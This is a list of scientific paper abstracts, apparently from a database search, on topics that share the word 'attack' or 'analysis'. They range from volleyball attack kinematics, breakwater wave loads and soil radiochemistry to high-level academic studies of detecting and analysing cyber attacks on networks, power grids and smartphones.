    The aim of the study was to describe and compare kinematics in two types of execution of attack hit, the goofy approach and regular approach. The research group consisted of players from the Czech Republic's top league (n = 12, age 28.0 ± 4.3 years, body height 196.6 ± 5.6 cm, body mass 89.7 ± 6.7 kg) divided into two groups according to the individual type of approach in the attack. Analysis of movement was performed by 3D kinematics video analysis, space coordinates were calculated by the DLT (Direct Linear Transformation) method together with interpretation software TEMA Bio 2.3 (Image Systems AB, Sweden). The players started their run-up from a distance of about 4 - 4.5 m from the net with similar maximal vertical velocity (2.91 - 2.96 m⋅s -1 ). The trajectory of players with goofy approach seemed to be convenient for the rotation of shoulders and hips in the moment of ball contact. Differences between both groups were observed. Players with a goofy approach had a longer flight phase compared to regularly approaching players.

  3. Risk analysis of breakwater caisson under wave attack using load surface approximation

    Science.gov (United States)

    Kim, Dong Hyawn

    2014-12-01

    A new load surface based approach to the reliability analysis of caisson-type breakwater is proposed. Uncertainties of the horizontal and vertical wave loads acting on breakwater are considered by using the so-called load surfaces, which can be estimated as functions of wave height, water level, and so on. Then, the first-order reliability method (FORM) can be applied to determine the probability of failure under the wave action. In this way, the reliability analysis of breakwaters with uncertainties both in wave height and in water level is possible. Moreover, the uncertainty in wave breaking can be taken into account by considering a random variable for wave height ratio which relates the significant wave height to the maximum wave height. The proposed approach is applied numerically to the reliability analysis of caisson breakwater under wave attack that may undergo partial or full wave breaking.

  4. Cyber Security Analysis by Attack Trees for a Reactor Protection System

    Energy Technology Data Exchange (ETDEWEB)

    Park, Gee-Yong; Lee, Cheol Kwon; Choi, Jong Gyun; Kim, Dong Hoon; Lee, Young Jun; Kwon, Kee-Choon [Korea Atomic Energy Research Institute, Daejeon (Korea, Republic of)

    2008-10-15

    As nuclear facilities are introducing digital systems, the cyber security becomes an emerging topic to be analyzed and resolved. The domestic and other nation's regulatory bodies notice this topic and are preparing an appropriate guidance. The nuclear industry where new construction or upgrade of I and C systems is planned is analyzing and establishing a cyber security. A risk-based analysis for the cyber security has been performed in the KNICS (Korea Nuclear I and C Systems) project where the cyber security analysis has been applied to a reactor protection system (RPS). In this paper, the cyber security analysis based on the attack trees is proposed for the KNICS RPS.

  5. METHODOLOGICAL APPROACH TO ANALYSIS AND EVALUATION OF INFORMATION PROTECTION IN INFORMATION SYSTEMS BASED ON VULNERABILITY DANGER

    Directory of Open Access Journals (Sweden)

    Y. M. Krotiuk

    2008-01-01

    Full Text Available The paper considers a methodological approach to an analysis and estimation of information security in the information systems which is based on the analysis of vulnerabilities and an extent of their hazard. By vulnerability hazard it is meant a complexity of its operation as a part of an information system. The required and sufficient vulnerability operational conditions  have  been  determined in the paper. The paper proposes a generalized model for attack realization which is used as a basis for construction of an attack realization model for an operation of a particular vulnerability. A criterion for estimation of information protection in the information systems which is based on the estimation of vulnerability hazard is formulated in the paper. The proposed approach allows to obtain a quantitative estimation of the information system security on the basis of the proposed schemes on realization of typical attacks for the distinguished classes of vulnerabilities.The methodical approach is used for choosing variants to be applied for realization of protection mechanisms in the information systems as well as for estimation of information safety in the operating information systems.

  6. Web server attack analyzer

    OpenAIRE

    Mižišin, Michal

    2013-01-01

    Web server attack analyzer - Abstract The goal of this work was to create prototype of analyzer of injection flaws attacks on web server. Proposed solution combines capabilities of web application firewall and web server log analyzer. Analysis is based on configurable signatures defined by regular expressions. This paper begins with summary of web attacks, followed by detection techniques analysis on web servers, description and justification of selected implementation. In the end are charact...

  7. Using a Realist Research Methodology in Policy Analysis

    Science.gov (United States)

    Lourie, Megan; Rata, Elizabeth

    2017-01-01

    The article describes the usefulness of a realist methodology in linking sociological theory to empirically obtained data through the development of a methodological device. Three layers of analysis were integrated: 1. the findings from a case study about Maori language education in New Zealand; 2. the identification and analysis of contradictions…

  8. The methodology of semantic analysis for extracting physical effects

    Science.gov (United States)

    Fomenkova, M. A.; Kamaev, V. A.; Korobkin, D. M.; Fomenkov, S. A.

    2017-01-01

    The paper represents new methodology of semantic analysis for physical effects extracting. This methodology is based on the Tuzov ontology that formally describes the Russian language. In this paper, semantic patterns were described to extract structural physical information in the form of physical effects. A new algorithm of text analysis was described.

  9. Development of analysis methodology on turbulent thermal stripping

    Energy Technology Data Exchange (ETDEWEB)

    Yoo, Geun Jong; Jeon, Won Dae; Han, Jin Woo; Gu, Byong Kook [Changwon National University, Changwon(Korea)

    2001-03-01

    For developing analysis methodology, important governing factors of thermal stripping phenomena are identified as geometric configuration and flow characteristics such as velocity. Along these factors, performance of turbulence models in existing analysis methodology are evaluated against experimental data. Status of DNS application is also accessed based on literature. Evaluation results are reflected in setting up the new analysis methodology. From the evaluation of existing analysis methodology, Full Reynolds Stress model is identified as best one among other turbulence models. And LES is found to be able to provide time dependent turbulence values. Further improvements in near-wall region and temperature variance equation are required for FRS and implementation of new sub-grid scale models is also required for LES. Through these improvements, new reliable analysis methodology for thermal stripping can be developed. 30 refs., 26 figs., 6 tabs. (Author)

  10. An Analysis of Media’s Role: Case Study of Army Public School (APS Peshawar Attack

    Directory of Open Access Journals (Sweden)

    Qureshi Rameesha

    2016-12-01

    Full Text Available The study aimed at analyzing the role of media during and after terrorist attacks by examining the media handling of APS Peshawar attack. The sample consisted of males and females selected on convenience basis from universities of Rawalpindi and Islamabad. It was hypothesized that (1 Extensive media coverage of terrorist attacks leads to greater publicity/recognition of terrorist groups (2 Media coverage of APS Peshawar attack increased fear and anxiety in public (3 Positive media handling/coverage of APS Peshawar attack led to public solidarity and peace. The results indicate that i Media coverage of terrorist attacks does help terrorist groups to gain publicity and recognition amongst public ii Media coverage of Aps Peshawar attack did not increase fear/anxiety in fact it directed the Pakistani nation towards public solidarity and peace.

  11. A Goal based methodology for HAZOP analysis

    DEFF Research Database (Denmark)

    Rossing, Netta Liin; Lind, Morten; Jensen, Niels

    2010-01-01

    to nodes with simple functions such as liquid transport, gas transport, liquid storage, gas-liquid contacting etc. From the functions of the nodes the selection of relevant process variables and deviation variables follows directly. The knowledge required to perform the pre-meeting HAZOP task of dividing...... the plant along functional lines is that of chemical unit operations and transport processes plus a some familiarity with the plant a hand. Thus the preparatory work may be performed by a chemical engineer with just an introductory course in risk assessment. The goal based methodology lends itself directly...

  12. Methodology for risk analysis of nuclear installations

    International Nuclear Information System (INIS)

    Vasconcelos, Vanderley de; Senne Junior, Murillo; Jordao, Elizabete

    2002-01-01

    Both the licensing standards for general uses in nuclear facilities and the specific ones require a risk assessment during their licensing processes. The risk assessment is carried out through the estimation of both probability of the occurrence of the accident, and their magnitudes. This is a complex task because the great deal of potential hazardous events that can occur in nuclear facilities difficult the statement of the accident scenarios. There are also many available techniques to identify the potential accidents, estimate their probabilities, and evaluate their magnitudes. In this paper is presented a new methodology that systematizes the risk assessment process, and orders the accomplishment of their several steps. (author)

  13. Bifurcation analysis and stability design for aircraft longitudinal motion with high angle of attack

    Directory of Open Access Journals (Sweden)

    Xin Qi

    2015-02-01

    Full Text Available Bifurcation analysis and stability design for aircraft longitudinal motion are investigated when the nonlinearity in flight dynamics takes place severely at high angle of attack regime. To predict the special nonlinear flight phenomena, bifurcation theory and continuation method are employed to systematically analyze the nonlinear motions. With the refinement of the flight dynamics for F-8 Crusader longitudinal motion, a framework is derived to identify the stationary bifurcation and dynamic bifurcation for high-dimensional system. Case study shows that the F-8 longitudinal motion undergoes saddle node bifurcation, Hopf bifurcation, Zero-Hopf bifurcation and branch point bifurcation under certain conditions. Moreover, the Hopf bifurcation renders series of multiple frequency pitch oscillation phenomena, which deteriorate the flight control stability severely. To relieve the adverse effects of these phenomena, a stabilization control based on gain scheduling and polynomial fitting for F-8 longitudinal motion is presented to enlarge the flight envelope. Simulation results validate the effectiveness of the proposed scheme.

  14. How Game Location Affects Soccer Performance: T-Pattern Analysis of Attack Actions in Home and Away Matches

    Directory of Open Access Journals (Sweden)

    Barbara Diana

    2017-08-01

    Full Text Available The influence of game location on performance has been widely examined in sport contexts. Concerning soccer, game-location affects positively the secondary and tertiary level of performance; however, there are fewer evidences about its effect on game structure (primary level of performance. This study aimed to detect the effect of game location on a primary level of performance in soccer. In particular, the objective was to reveal the hidden structures underlying the attack actions, in both home and away matches played by a top club (Serie A 2012/2013—First Leg. The methodological approach was based on systematic observation, supported by digital recordings and T-pattern analysis. Data were analyzed with THEME 6.0 software. A quantitative analysis, with nonparametric Mann–Whitney test and descriptive statistics, was carried out to test the hypotheses. A qualitative analysis on complex patterns was performed to get in-depth information on the game structure. This study showed that game tactics were significantly different, with home matches characterized by a more structured and varied game than away matches. In particular, a higher number of different patterns, with a higher level of complexity and including more unique behaviors was detected in home matches than in the away ones. No significant differences were found in the number of events coded per game between the two conditions. THEME software, and the corresponding T-pattern detection algorithm, enhance research opportunities by going further than frequency-based analyses, making this method an effective tool in supporting sport performance analysis and training.

  15. How Game Location Affects Soccer Performance: T-Pattern Analysis of Attack Actions in Home and Away Matches.

    Science.gov (United States)

    Diana, Barbara; Zurloni, Valentino; Elia, Massimiliano; Cavalera, Cesare M; Jonsson, Gudberg K; Anguera, M Teresa

    2017-01-01

    The influence of game location on performance has been widely examined in sport contexts. Concerning soccer, game-location affects positively the secondary and tertiary level of performance; however, there are fewer evidences about its effect on game structure (primary level of performance). This study aimed to detect the effect of game location on a primary level of performance in soccer. In particular, the objective was to reveal the hidden structures underlying the attack actions, in both home and away matches played by a top club (Serie A 2012/2013-First Leg). The methodological approach was based on systematic observation, supported by digital recordings and T-pattern analysis. Data were analyzed with THEME 6.0 software. A quantitative analysis, with nonparametric Mann-Whitney test and descriptive statistics, was carried out to test the hypotheses. A qualitative analysis on complex patterns was performed to get in-depth information on the game structure. This study showed that game tactics were significantly different, with home matches characterized by a more structured and varied game than away matches. In particular, a higher number of different patterns, with a higher level of complexity and including more unique behaviors was detected in home matches than in the away ones. No significant differences were found in the number of events coded per game between the two conditions. THEME software, and the corresponding T-pattern detection algorithm, enhance research opportunities by going further than frequency-based analyses, making this method an effective tool in supporting sport performance analysis and training.

  16. Vesper: Using Echo-Analysis to Detect Man-in-the-Middle Attacks in LANs

    OpenAIRE

    Mirsky, Yisroel; Kalbo, Naor; Elovici, Yuval; Shabtai, Asaf

    2018-01-01

    The Man-in-the-Middle (MitM) attack is a cyber-attack in which an attacker intercepts traffic, thus harming the confidentiality, integrity, and availability of the network. It remains a popular attack vector due to its simplicity. However, existing solutions are either not portable, suffer from a high false positive rate, or are simply not generic. In this paper, we propose Vesper: a novel plug-and-play MitM detector for local area networks. Vesper uses a technique inspired from impulse respo...

  17. Cyber attacks against state estimation in power systems: Vulnerability analysis and protection strategies

    Science.gov (United States)

    Liu, Xuan

    Power grid is one of the most critical infrastructures in a nation and could suffer a variety of cyber attacks. With the development of Smart Grid, false data injection attack has recently attracted wide research interest. This thesis proposes a false data attack model with incomplete network information and develops optimal attack strategies for attacking load measurements and the real-time topology of a power grid. The impacts of false data on the economic and reliable operations of power systems are quantitatively analyzed in this thesis. To mitigate the risk of cyber attacks, a distributed protection strategies are also developed. It has been shown that an attacker can design false data to avoid being detected by the control center if the network information of a power grid is known to the attacker. In practice, however, it is very hard or even impossible for an attacker to obtain all network information of a power grid. In this thesis, we propose a local load redistribution attacking model based on incomplete network information and show that an attacker only needs to obtain the network information of the local attacking region to inject false data into smart meters in the local region without being detected by the state estimator. A heuristic algorithm is developed to determine a feasible attacking region by obtaining reduced network information. This thesis investigates the impacts of false data on the operations of power systems. It has been shown that false data can be designed by an attacker to: 1) mask the real-time topology of a power grid; 2) overload a transmission line; 3) disturb the line outage detection based on PMU data. To mitigate the risk of cyber attacks, this thesis proposes a new protection strategy, which intends to mitigate the damage effects of false data injection attacks by protecting a small set of critical measurements. To further reduce the computation complexity, a mixed integer linear programming approach is also proposed to

  18. Update of Part 61 Impacts Analysis Methodology. Methodology report. Volume 1

    Energy Technology Data Exchange (ETDEWEB)

    Oztunali, O.I.; Roles, G.W.

    1986-01-01

    Under contract to the US Nuclear Regulatory Commission, the Envirosphere Company has expanded and updated the impacts analysis methodology used during the development of the 10 CFR Part 61 rule to allow improved consideration of the costs and impacts of treatment and disposal of low-level waste that is close to or exceeds Class C concentrations. The modifications described in this report principally include: (1) an update of the low-level radioactive waste source term, (2) consideration of additional alternative disposal technologies, (3) expansion of the methodology used to calculate disposal costs, (4) consideration of an additional exposure pathway involving direct human contact with disposed waste due to a hypothetical drilling scenario, and (5) use of updated health physics analysis procedures (ICRP-30). Volume 1 of this report describes the calculational algorithms of the updated analysis methodology.

  19. Update of Part 61 Impacts Analysis Methodology. Methodology report. Volume 1

    International Nuclear Information System (INIS)

    Oztunali, O.I.; Roles, G.W.

    1986-01-01

    Under contract to the US Nuclear Regulatory Commission, the Envirosphere Company has expanded and updated the impacts analysis methodology used during the development of the 10 CFR Part 61 rule to allow improved consideration of the costs and impacts of treatment and disposal of low-level waste that is close to or exceeds Class C concentrations. The modifications described in this report principally include: (1) an update of the low-level radioactive waste source term, (2) consideration of additional alternative disposal technologies, (3) expansion of the methodology used to calculate disposal costs, (4) consideration of an additional exposure pathway involving direct human contact with disposed waste due to a hypothetical drilling scenario, and (5) use of updated health physics analysis procedures (ICRP-30). Volume 1 of this report describes the calculational algorithms of the updated analysis methodology

  20. Shuttle TPS thermal performance and analysis methodology

    Science.gov (United States)

    Neuenschwander, W. E.; Mcbride, D. U.; Armour, G. A.

    1983-01-01

    Thermal performance of the thermal protection system was approximately as predicted. The only extensive anomalies were filler bar scorching and over-predictions in the high Delta p gap heating regions of the orbiter. A technique to predict filler bar scorching has been developed that can aid in defining a solution. Improvement in high Delta p gap heating methodology is still under study. Minor anomalies were also examined for improvements in modeling techniques and prediction capabilities. These include improved definition of low Delta p gap heating, an analytical model for inner mode line convection heat transfer, better modeling of structure, and inclusion of sneak heating. The limited number of problems related to penetration items that presented themselves during orbital flight tests were resolved expeditiously, and designs were changed and proved successful within the time frame of that program.

  1. METHODOLOGICAL ANALYSIS OF TRAINING STUDENT basketball teams

    Directory of Open Access Journals (Sweden)

    Kozina Zh.L.

    2011-06-01

    Full Text Available Considered the leading position of the preparation of basketball teams in high schools. The system includes the following: reliance on top-quality players in the structure of preparedness, widespread use of visual aids, teaching movies and cartoons with a record of technology implementation of various methods by professional basketball players, the application of the methods of autogenic and ideomotor training according to our methodology. The study involved 63 students 1.5 courses from various universities of Kharkov 1.2 digits: 32 experimental group and 31 - control. The developed system of training students, basketball players used within 1 year. The efficiency of the developed system in the training process of students, basketball players.

  2. An economic analysis methodology for project evaluation and programming.

    Science.gov (United States)

    2013-08-01

    Economic analysis is a critical component of a comprehensive project or program evaluation methodology that considers all key : quantitative and qualitative impacts of highway investments. It allows highway agencies to identify, quantify, and value t...

  3. Development of Advanced Non-LOCA Analysis Methodology for Licensing

    International Nuclear Information System (INIS)

    Jang, Chansu; Um, Kilsup; Choi, Jaedon

    2008-01-01

    KNF is developing a new design methodology on the Non-LOCA analysis for the licensing purpose. The code chosen is the best-estimate transient analysis code RETRAN and the OPR1000 is aimed as a target plant. For this purpose, KNF prepared a simple nodal scheme appropriate to the licensing analyses and developed the designer-friendly analysis tool ASSIST (Automatic Steady-State Initialization and Safety analysis Tool). To check the validity of the newly developed methodology, the single CEA withdrawal and the locked rotor accidents are analyzed by using a new methodology and are compared with current design results. Comparison results show a good agreement and it is concluded that the new design methodology can be applied to the licensing calculations for OPR1000 Non-LOCA

  4. Opening Remarks of the Acquisition Path Analysis Methodology Session

    International Nuclear Information System (INIS)

    Renis, T.

    2015-01-01

    An overview of the recent development work that has been done on acquisition path analysis, implementation of the methodologies within the Department of Safeguards, lessons learned and future areas for development will be provided. (author)

  5. Vulnerability and Risk Analysis Program: Overview of Assessment Methodology

    National Research Council Canada - National Science Library

    2001-01-01

    .... Over the last three years, a team of national laboratory experts, working in partnership with the energy industry, has successfully applied the methodology as part of OCIP's Vulnerability and Risk Analysis Program (VRAP...

  6. A methodology for the data energy regional consumption consistency analysis

    International Nuclear Information System (INIS)

    Canavarros, Otacilio Borges; Silva, Ennio Peres da

    1999-01-01

    The article introduces a methodology for data energy regional consumption consistency analysis. The work was going based on recent studies accomplished by several cited authors and boarded Brazilian matrices and Brazilian energetics regional balances. The results are compared and analyzed

  7. Reachable Sets of Hidden CPS Sensor Attacks : Analysis and Synthesis Tools

    NARCIS (Netherlands)

    Murguia, Carlos; van de Wouw, N.; Ruths, Justin; Dochain, Denis; Henrion, Didier; Peaucelle, Dimitri

    2017-01-01

    For given system dynamics, control structure, and fault/attack detection procedure, we provide mathematical tools–in terms of Linear Matrix Inequalities (LMIs)–for characterizing and minimizing the set of states that sensor attacks can induce in the system while keeping the alarm rate of the

  8. Lone Actor Terrorist Attack Planning and Preparation : A Data-Driven Analysis

    NARCIS (Netherlands)

    Schuurman, B.W.; Bakker, E.; Gill, P.; Bouhana, N.

    2017-01-01

    This article provides an in-depth assessment of lone actor terrorists’ attack planning and preparation. A codebook of 198 variables related to different aspects of pre-attack behavior is applied to a sample of 55 lone actor terrorists. Data were drawn from open-source materials and complemented

  9. A system for denial-of-service attack detection based on multivariate correlation analysis

    NARCIS (Netherlands)

    Tan, Zhiyuan; Jamdagni, Aruna; He, Xiangjian; Nanda, Priyadarsi; Liu, Ren Ping

    Interconnected systems, such as Web servers, database servers, cloud computing servers and so on, are now under threads from network attackers. As one of most common and aggressive means, denial-of-service (DoS) attacks cause serious impact on these computing systems. In this paper, we present a DoS

  10. Severe accident analysis methodology in support of accident management

    International Nuclear Information System (INIS)

    Boesmans, B.; Auglaire, M.; Snoeck, J.

    1997-01-01

    The author addresses the implementation at BELGATOM of a generic severe accident analysis methodology, which is intended to support strategic decisions and to provide quantitative information in support of severe accident management. The analysis methodology is based on a combination of severe accident code calculations, generic phenomenological information (experimental evidence from various test facilities regarding issues beyond present code capabilities) and detailed plant-specific technical information

  11. Radiochemical Analysis Methodology for uranium Depletion Measurements

    Energy Technology Data Exchange (ETDEWEB)

    Scatena-Wachel DE

    2007-01-09

    This report provides sufficient material for a test sponsor with little or no radiochemistry background to understand and follow physics irradiation test program execution. Most irradiation test programs employ similar techniques and the general details provided here can be applied to the analysis of other irradiated sample types. Aspects of program management directly affecting analysis quality are also provided. This report is not an in-depth treatise on the vast field of radiochemical analysis techniques and related topics such as quality control. Instrumental technology is a very fast growing field and dramatic improvements are made each year, thus the instrumentation described in this report is no longer cutting edge technology. Much of the background material is still applicable and useful for the analysis of older experiments and also for subcontractors who still retain the older instrumentation.

  12. Diversion Path Analysis Handbook. Volume 1. Methodology

    International Nuclear Information System (INIS)

    Goodwin, K.E.; Schleter, J.C.; Maltese, M.D.K.

    1978-11-01

    Diversion Path Analysis (DPA) is a safeguards evaluation tool which is used to determine the vulnerability of the Material Control and Material Accounting (MC and MA) Subsystems to the threat of theft of Special Nuclear Material (SNM) by a knowledgeable Insider. The DPA team should consist of two individuals who have technical backgrounds. The implementation of DPA is divided into five basic steps: Information and Data Gathering, Process Characterization, Analysis of Diversion Paths, Results and Findings, and Documentation

  13. Real-Time Detection of Application-Layer DDoS Attack Using Time Series Analysis

    Directory of Open Access Journals (Sweden)

    Tongguang Ni

    2013-01-01

    Full Text Available Distributed denial of service (DDoS attacks are one of the major threats to the current Internet, and application-layer DDoS attacks utilizing legitimate HTTP requests to overwhelm victim resources are more undetectable. Consequently, neither intrusion detection systems (IDS nor victim server can detect malicious packets. In this paper, a novel approach to detect application-layer DDoS attack is proposed based on entropy of HTTP GET requests per source IP address (HRPI. By approximating the adaptive autoregressive (AAR model, the HRPI time series is transformed into a multidimensional vector series. Then, a trained support vector machine (SVM classifier is applied to identify the attacks. The experiments with several databases are performed and results show that this approach can detect application-layer DDoS attacks effectively.

  14. Techniques of sample attack used in soil and mineral analysis. Phase I

    International Nuclear Information System (INIS)

    Chiu, N.W.; Dean, J.R.; Sill, C.W.

    1984-07-01

    Several techniques of sample attack for the determination of radioisotopes are reviewed. These techniques include: 1) digestion with nitric or hydrochloric acid in Parr digestion bomb, 2) digestion with a mixture of nitric and hydrochloric acids, 3) digestion with a mixture of hydrofluoric, nitric and perchloric acids, and 4) fusion with sodium carbonate, potassium fluoride or alkali pyrosulfates. The effectiveness of these techniques to decompose various soils and minerals containing radioisotopes such as lead-210 uranium, thorium and radium-226 are discussed. The combined procedure of potassium fluoride fusion followed by alkali pyrosulfate fusion is recommended for radium-226, uranium and thorium analysis. This technique guarantees the complete dissolution of samples containing refractory materials such as silica, silicates, carbides, oxides and sulfates. For the lead-210 analysis, the procedure of digestion with a mixture of hydrofluoric, nitric and perchloric acids followed by fusion with alkali pyrosulfate is recommended. These two procedures are detailed. Schemes for the sequential separation of the radioisotopes from a dissolved sample solution are outlined. Procedures for radiochemical analysis are suggested

  15. SINGULAR SPECTRUM ANALYSIS: METHODOLOGY AND APPLICATION TO ECONOMICS DATA

    Institute of Scientific and Technical Information of China (English)

    Hossein HASSANI; Anatoly ZHIGLJAVSKY

    2009-01-01

    This paper describes the methodology of singular spectrum analysis (SSA) and demonstrate that it is a powerful method of time series analysis and forecasting, particulary for economic time series. The authors consider the application of SSA to the analysis and forecasting of the Iranian national accounts data as provided by the Central Bank of the Islamic Republic of lran.

  16. Gap analysis methodology for business service engineering

    NARCIS (Netherlands)

    Nguyen, D.K.; van den Heuvel, W.J.A.M.; Papazoglou, M.; de Castro, V.; Marcos, E.; Hofreiter, B.; Werthner, H.

    2009-01-01

    Many of today’s service analysis and design techniques rely on ad-hoc and experience-based identification of value-creating business services and implicitly assume a “green-field” situation focusing on the development of completely new services while offering very limited support for discovering

  17. Discourse analysis: making complex methodology simple

    NARCIS (Netherlands)

    Bondarouk, Tatiana; Ruel, Hubertus Johannes Maria; Leino, T.; Saarinen, T.; Klein, S.

    2004-01-01

    Discursive-based analysis of organizations is not new in the field of interpretive social studies. Since not long ago have information systems (IS) studies also shown a keen interest in discourse (Wynn et al, 2002). The IS field has grown significantly in its multiplicity that is echoed in the

  18. Towards the Development of a Methodology for the Cyber Security Analysis of Safety Related Nuclear Digital I and C Systems

    International Nuclear Information System (INIS)

    Khand, Parvaiz Ahmed; Seong, Poong Hyun

    2007-01-01

    In nuclear power plants the redundant safety related systems are designed to take automatic action to prevent and mitigate accident conditions if the operators and the non-safety systems fail to maintain the plant within normal operating conditions. In case of an event, the failure of these systems has catastrophic consequences. The tendency in the industry over the past 10 years has been to use of commercial of the shelf (COTS) technologies in these systems. COTS software was written with attention to function and performance rather than security. COTS hardware usually designed to fail safe, but security vulnerabilities could be exploited by an attacker to disable the fail safe mechanisms. Moreover, the use of open protocols and operating systems in these technologies make the plants to become vulnerable to a host of cyber attacks. An effective security analysis process is required during all life cycle phases of these systems in order to ensure the security from cyber attacks. We are developing a methodology for the cyber security analysis of safety related nuclear digital I and C Systems. This methodology will cover all phases of development, operation and maintenance processes of software life cycle. In this paper, we will present a security analysis process for the concept stage of software development life cycle

  19. Scenario aggregation and analysis via Mean-Shift Methodology

    International Nuclear Information System (INIS)

    Mandelli, D.; Yilmaz, A.; Metzroth, K.; Aldemir, T.; Denning, R.

    2010-01-01

    A new generation of dynamic methodologies is being developed for nuclear reactor probabilistic risk assessment (PRA) which explicitly account for the time element in modeling the probabilistic system evolution and use numerical simulation tools to account for possible dependencies between failure events. The dynamic event tree (DET) approach is one of these methodologies. One challenge with dynamic PRA methodologies is the large amount of data they produce which may be difficult to analyze without appropriate software tools. The concept of 'data mining' is well known in the computer science community and several methodologies have been developed in order to extract useful information from a dataset with a large number of records. Using the dataset generated by the DET analysis of the reactor vessel auxiliary cooling system (RVACS) of an ABR-1000 for an aircraft crash recovery scenario and the Mean-Shift Methodology for data mining, it is shown how clusters of transients with common characteristics can be identified and classified. (authors)

  20. Methodological aspects on drug receptor binding analysis

    International Nuclear Information System (INIS)

    Wahlstroem, A.

    1978-01-01

    Although drug receptors occur in relatively low concentrations, they can be visualized by the use of appropriate radioindicators. In most cases the procedure is rapid and can reach a high degree of accuracy. Specificity of the interaction is studied by competition analysis. The necessity of using several radioindicators to define a receptor population is emphasized. It may be possible to define isoreceptors and drugs with selectivity for one isoreceptor. (Author)

  1. Attack surfaces

    DEFF Research Database (Denmark)

    Gruschka, Nils; Jensen, Meiko

    2010-01-01

    The new paradigm of cloud computing poses severe security risks to its adopters. In order to cope with these risks, appropriate taxonomies and classification criteria for attacks on cloud computing are required. In this work-in-progress paper we present one such taxonomy based on the notion...... of attack surfaces of the cloud computing scenario participants....

  2. Attack tree analysis for insider threats on the IoT using isabelle

    DEFF Research Database (Denmark)

    Kammüller, Florian; Nurse, Jason R. C.; Probst, Christian W.

    2016-01-01

    The Internet-of-Things (IoT) aims at integrating small devices around humans. The threat from human insiders in "regular" organisations is real; in a fully-connected world of the IoT, organisations face a substantially more severe security challenge due to unexpected access possibilities and info....... On the classified IoT attack examples, we show how this logical approach can be used to make the models more precise and to analyse the previously identified Insider IoT attacks using Isabelle attack trees....

  3. Analysis of Alternatives for Risk Assessment Methodologies and Tools

    Energy Technology Data Exchange (ETDEWEB)

    Nachtigal, Noel M. [Sandia National Lab. (SNL-CA), Livermore, CA (United States). System Analytics; Fruetel, Julia A. [Sandia National Lab. (SNL-CA), Livermore, CA (United States). Systems Research and Analysis; Gleason, Nathaniel J. [Sandia National Lab. (SNL-CA), Livermore, CA (United States). Systems Research and Analysis; Helms, Jovana [Sandia National Lab. (SNL-CA), Livermore, CA (United States). Systems Research and Analysis; Imbro, Dennis Raymond [Sandia National Lab. (SNL-CA), Livermore, CA (United States). Systems Research and Analysis; Sumner, Matthew C. [Sandia National Lab. (SNL-CA), Livermore, CA (United States). Systems Research and Analysis

    2013-10-01

    The purpose of this document is to provide a basic overview and understanding of risk assessment methodologies and tools from the literature and to assess the suitability of these methodologies and tools for cyber risk assessment. Sandia National Laboratories (SNL) performed this review in support of risk modeling activities performed for the Stakeholder Engagement and Cyber Infrastructure Resilience (SECIR) division of the Department of Homeland Security (DHS) Office of Cybersecurity and Communications (CS&C). The set of methodologies and tools covered in this document is not intended to be exhaustive; instead, it focuses on those that are commonly used in the risk assessment community. The classification of methodologies and tools was performed by a group of analysts with experience in risk analysis and cybersecurity, and the resulting analysis of alternatives has been tailored to address the needs of a cyber risk assessment.

  4. Identifying and tracking attacks on networks: C3I displays and related technologies

    Science.gov (United States)

    Manes, Gavin W.; Dawkins, J.; Shenoi, Sujeet; Hale, John C.

    2003-09-01

    Converged network security is extremely challenging for several reasons; expanded system and technology perimeters, unexpected feature interaction, and complex interfaces all conspire to provide hackers with greater opportunities for compromising large networks. Preventive security services and architectures are essential, but in and of themselves do not eliminate all threat of compromise. Attack management systems mitigate this residual risk by facilitating incident detection, analysis and response. There are a wealth of attack detection and response tools for IP networks, but a dearth of such tools for wireless and public telephone networks. Moreover, methodologies and formalisms have yet to be identified that can yield a common model for vulnerabilities and attacks in converged networks. A comprehensive attack management system must coordinate detection tools for converged networks, derive fully-integrated attack and network models, perform vulnerability and multi-stage attack analysis, support large-scale attack visualization, and orchestrate strategic responses to cyber attacks that cross network boundaries. We present an architecture that embodies these principles for attack management. The attack management system described engages a suite of detection tools for various networking domains, feeding real-time attack data to a comprehensive modeling, analysis and visualization subsystem. The resulting early warning system not only provides network administrators with a heads-up cockpit display of their entire network, it also supports guided response and predictive capabilities for multi-stage attacks in converged networks.

  5. JFCGuard: Detecting juice filming charging attack via processor usage analysis on smartphones

    DEFF Research Database (Denmark)

    Meng, Weizhi; Jiang, Lijun; Wang, Yu

    2017-01-01

    Smartphones have become necessities in people' lives, so that many more public charging stations are under deployment worldwide to meet the increasing demand of phone charging (i.e., in airports, subways, shops, etc). However, this situation may expose a hole for cyber-criminals to launch various...... attacks especially charging attacks and threaten user's privacy. As an example, juice filming charging (JFC) attack is able to steal users' sensitive and private information from both Android OS and iOS devices, through automatically recording phone-screen and monitoring users' inputs during the whole...... charging period. More importantly, this attack does not need any permission or installing any pieces of apps on user's side. The rationale is that users' information can be leaked through a standard micro USB connector that employs the Mobile High-Definition Link (MHL) standard. Motivated by the potential...

  6. Diversion path analysis handbook. Volume I. Methodology

    International Nuclear Information System (INIS)

    Maltese, M.D.K.; Goodwin, K.E.; Schleter, J.C.

    1976-10-01

    Diversion Path Analysis (DPA) is a procedure for analyzing internal controls of a facility in order to identify vulnerabilities to successful diversion of material by an adversary. The internal covert threat is addressed but the results are also applicable to the external overt threat. The diversion paths are identified. Complexity parameters include records alteration or falsification, multiple removals of sub-threshold quantities, collusion, and access authorization of the individual. Indicators, or data elements and information of significance to detection of unprevented theft, are identified by means of DPA. Indicator sensitivity is developed in terms of the threshold quantity, the elapsed time between removal and indication and the degree of localization of facility area and personnel given by the indicator. Evaluation of facility internal controls in light of these sensitivities defines the capability of interrupting identified adversary action sequences related to acquisition of material at fixed sites associated with the identified potential vulnerabilities. Corrective measures can, in many cases, also be prescribed for management consideration and action. DPA theory and concepts have been developing over the last several years, and initial field testing proved both the feasibility and practicality of the procedure. Follow-on implementation testing verified the ability of facility personnel to perform DPA

  7. Large-Scale Analysis of Remote Code Injection Attacks in Android Apps

    OpenAIRE

    Choi, Hyunwoo; Kim, Yongdae

    2018-01-01

    It is pretty well known that insecure code updating procedures for Android allow remote code injection attack. However, other than codes, there are many resources in Android that have to be updated, such as temporary files, images, databases, and configurations (XML and JSON). Security of update procedures for these resources is largely unknown. This paper investigates general conditions for remote code injection attacks on these resources. Using this, we design and implement a static detecti...

  8. Analysis of Protection Measures for Naval Vessels Berthed at Harbor Against Terrorist Attacks

    Science.gov (United States)

    2016-06-01

    of discriminating neutral vessels from threats. A naval vessel berthed at harbor is more susceptible to attack than a vessel in open seas. The...discriminating neutral vessels from threats. A naval vessel berthed at harbor is more susceptible to attack than a vessel in open seas. The chances of...this thesis. He was a source of inspiration, encouragement, and reassurance. Captain Jeffery E. Kline, I am really thankful to you for your ideas

  9. Advanced Power Plant Development and Analysis Methodologies

